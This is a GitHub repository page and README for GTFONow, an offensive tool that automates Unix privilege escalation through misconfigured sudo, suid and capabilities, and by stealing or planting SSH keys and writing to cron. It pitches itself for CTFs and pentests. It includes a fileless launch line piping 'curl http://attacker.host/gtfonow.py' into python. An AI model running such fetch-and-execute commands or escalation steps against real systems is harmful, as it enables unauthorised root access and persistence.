Skip to content
/ GTFONow Public

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.

License

MIT license
564 stars 72 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Frissi0n/GTFONow

29 Branches4 Tags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

github-actions[bot]Frissi0n
github-actions[bot]
and
Frissi0n
feat: Update GTFOBins (#50)
Nov 10, 2024
f16f69a Β· Nov 10, 2024

History

34 Commits
.github/workflows
.github/workflows
Dec 4, 2023
GTFOBins.github.io @ ac8e667
GTFOBins.github.io @ ac8e667
Nov 10, 2024
gtfonow
gtfonow
Jun 26, 2024
.gitignore
.gitignore
Jan 18, 2021
.gitmodules
.gitmodules
Dec 2, 2023
CHANGELOG.md
CHANGELOG.md
Jun 26, 2024
Dockerfile
Dockerfile
Dec 4, 2023
LICENSE
LICENSE
Jan 18, 2021
README.md
README.md
Dec 4, 2023
gtfobin_update.py
gtfobin_update.py
Dec 3, 2023
supervisord.conf
supervisord.conf
Dec 4, 2023

Repository files navigation

Main Branch

GTFONow

Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests.

asciicast

βœ… Features

  • Automatically exploit misconfigured sudo permissions.
  • Automatically exploit misconfigured suid, sgid permissions.
  • Automatically exploit misconfigured capabilities.
  • Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
  • Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
  • Automatically convert arbitrary file write primitive into shell by writing to cron.
  • Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
  • Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

πŸ’» Usage

To use GTFONow, simply run the script from your command line. The basic syntax is as follows:

python gtfonow.py [OPTIONS]

It can also be run by piping the output of curl:

curl http://attacker.host/gtfonow.py | python

Options

  • --level: Sets the level of checks to perform. You can choose between:
    • 1 (default) for a quick scan.
    • 2 for a more thorough scan.
    • Example: python gtfonow.py --level 2
  • --risk: Specifies the risk level of the exploit to perform. The options are:
    • 1 (default) for safe operations.
    • 2 for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing.
    • Example: python gtfonow.py --risk 2
  • --command: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.
    • Example: python gtfonow.py --command 'ls -la'
  • --auto: Automatically exploits without user wizard.
  • -v, --verbose: Enables verbose output.
    • Example: python gtfonow.py --verbose

Compatibility

By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed.

  • Python2.*
  • Python3.*
  • No 3rd party dependencies
  • Any Unix Variant (Linux, MacOS,*Nix)
  • Any architecture eg (X86/ARM64/X86-64)

πŸ™ Credits

About

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.

Topics

security hacking pentesting ctf post-exploitation pentest offensive-security privilege-escalation ctf-tools security-tools redteam hackthebox gtfobins suid-binaries

Resources

Readme

License

MIT license
Activity

Stars

564 stars

Watchers

10 watching

Forks

72 forks
Report repository

Releases 4

v0.3.0 Latest
Jun 26, 2024
+ 3 releases

Contributors 4

Languages